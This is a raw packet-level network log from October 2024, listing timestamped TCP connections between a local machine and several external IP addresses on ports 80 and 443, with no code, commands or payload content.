                                                                                                                                      Oct 7, 2024 03:23:17.457356930 CEST4434987813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.518935919 CEST4985480192.168.2.4185.215.113.37
                                                                                                                                      Oct 7, 2024 03:23:17.805911064 CEST4434987313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.806360960 CEST49873443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:17.806380987 CEST4434987313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.806972980 CEST49873443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:17.806979895 CEST4434987313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.841730118 CEST8049872185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.841799974 CEST4987280192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:17.843292952 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:17.843660116 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:17.850292921 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.850353956 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:17.850481987 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.850548029 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:17.850703955 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:17.858551025 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.906198025 CEST4434987313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.906266928 CEST4434987313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.906323910 CEST49873443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:17.906344891 CEST4434987313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.906373978 CEST4434987313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.906423092 CEST49873443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:17.906543970 CEST49873443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:17.906562090 CEST4434987313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.906573057 CEST49873443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:17.906579971 CEST4434987313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.909382105 CEST49880443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:17.909455061 CEST4434988013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:17.909590960 CEST49880443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:17.909754038 CEST49880443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:17.909787893 CEST4434988013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.054735899 CEST4434987513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.055238008 CEST49875443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.055258036 CEST4434987513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.055711031 CEST49875443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.055716991 CEST4434987513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.092556953 CEST4434987713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.093096972 CEST49877443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.093111992 CEST4434987713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.093565941 CEST49877443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.093575001 CEST4434987713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.095757008 CEST4434987813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.096383095 CEST49878443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.096394062 CEST4434987813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.096802950 CEST49878443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.096813917 CEST4434987813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.097904921 CEST4434987613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.098262072 CEST49876443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.098293066 CEST4434987613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.098685980 CEST49876443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.098692894 CEST4434987613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.154000044 CEST4434987513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.154129028 CEST4434987513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.154179096 CEST49875443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.154289961 CEST49875443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.154299021 CEST4434987513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.154308081 CEST49875443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.154310942 CEST4434987513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.157073021 CEST49882443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.157099009 CEST4434988213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.157186985 CEST49882443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.157290936 CEST49882443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.157311916 CEST4434988213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.190572977 CEST4434987713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.190840006 CEST4434987713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.190891027 CEST49877443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.190931082 CEST49877443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.190946102 CEST4434987713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.190957069 CEST49877443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.190960884 CEST4434987713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.193248987 CEST49883443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.193267107 CEST4434988313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.193329096 CEST49883443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.193456888 CEST49883443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.193470955 CEST4434988313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.194911957 CEST4434987813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.195312977 CEST4434987813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.195367098 CEST4434987813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.195406914 CEST49878443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.195439100 CEST49878443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.195455074 CEST49878443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.195461035 CEST4434987813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.195539951 CEST49878443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.195544958 CEST4434987813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.197581053 CEST49884443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.197654963 CEST4434988413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.197870016 CEST49884443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.198008060 CEST49884443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.198040009 CEST4434988413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.198358059 CEST4434987613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.198385000 CEST4434987613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.198426962 CEST4434987613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.198472977 CEST49876443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.198575974 CEST49876443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.198586941 CEST4434987613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.198600054 CEST49876443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.198605061 CEST4434987613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.200285912 CEST49885443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.200344086 CEST4434988513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.200460911 CEST49885443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.200572014 CEST49885443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.200601101 CEST4434988513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.548907995 CEST4434988013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.549506903 CEST49880443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.549535990 CEST4434988013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.549841881 CEST49880443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.549846888 CEST4434988013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.561058044 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.561081886 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.561093092 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.561136961 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.561147928 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.561158895 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.561199903 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.561211109 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.561220884 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.561230898 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.561230898 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.561230898 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.561230898 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.561230898 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.561259031 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.561264992 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.566178083 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.566241026 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.566270113 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.566323996 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.566442966 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.566485882 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.640100956 CEST49886443192.168.2.4142.250.184.228
                                                                                                                                      Oct 7, 2024 03:23:18.640132904 CEST44349886142.250.184.228192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.640228033 CEST49886443192.168.2.4142.250.184.228
                                                                                                                                      Oct 7, 2024 03:23:18.640535116 CEST49886443192.168.2.4142.250.184.228
                                                                                                                                      Oct 7, 2024 03:23:18.640547991 CEST44349886142.250.184.228192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.646893024 CEST4434988013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.647052050 CEST4434988013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.647149086 CEST49880443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.647181988 CEST49880443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.647200108 CEST4434988013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.647208929 CEST49880443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.647213936 CEST4434988013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.650254011 CEST49887443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.650311947 CEST4434988713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.650382996 CEST49887443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.650515079 CEST49887443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.650548935 CEST4434988713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.690335989 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.690411091 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.690442085 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.690474987 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.690495014 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.690500975 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.690524101 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.690572023 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.690812111 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.690865040 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.690897942 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.690922022 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.690929890 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.690947056 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.690965891 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.690974951 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.690999985 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.691008091 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.691050053 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.691740036 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.691788912 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.691791058 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.691823959 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.691833019 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.691857100 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.691890001 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.691905022 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.691924095 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.691972971 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.692677021 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.692728043 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.692728996 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.692764044 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.692795992 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.692809105 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.692831039 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.692833900 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.693111897 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.693420887 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.693475008 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.695358992 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.695415020 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.789577961 CEST4434988213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.790029049 CEST49882443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.790054083 CEST4434988213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.790617943 CEST49882443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.790627003 CEST4434988213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.819760084 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.819792032 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.819825888 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.819873095 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.819891930 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.819932938 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.819984913 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820034027 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.820035934 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820069075 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820102930 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820116043 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.820137024 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820152044 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.820171118 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820204020 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820214033 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.820238113 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820269108 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820278883 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.820305109 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820310116 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.820790052 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820820093 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820844889 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.820861101 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.820877075 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820909977 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820925951 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.820945024 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820955992 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.820981026 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.820987940 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821023941 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821135998 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.821185112 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821201086 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.821238995 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.821248055 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821274042 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.821286917 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821316004 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821326971 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.821358919 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.821372032 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821396112 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.821403027 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821429968 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.821435928 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821464062 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.821477890 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821500063 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.821508884 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821548939 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.821980000 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822026014 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822031021 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822066069 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822073936 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822108984 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822124004 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822156906 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822170973 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822191000 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822202921 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822225094 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822235107 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822257996 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822266102 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822290897 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822302103 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822324991 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822335958 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822356939 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822365999 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822391033 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822422028 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822437048 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.822947979 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.822982073 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.823014975 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.823025942 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.823048115 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.823060036 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.823081017 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.823128939 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.830485106 CEST4434988413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.832003117 CEST49884443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.832030058 CEST4434988413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.832524061 CEST49884443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.832535028 CEST4434988413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.846453905 CEST4434988313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.846853971 CEST4434988513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.846955061 CEST49883443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.846977949 CEST4434988313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.847177982 CEST49885443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.847198963 CEST4434988513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.847466946 CEST49883443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.847480059 CEST4434988313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.847614050 CEST49885443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.847625971 CEST4434988513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.888520956 CEST4434988213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.888556957 CEST4434988213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.888595104 CEST4434988213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.888644934 CEST49882443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.888778925 CEST49882443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.888778925 CEST49882443192.168.2.413.107.246.45
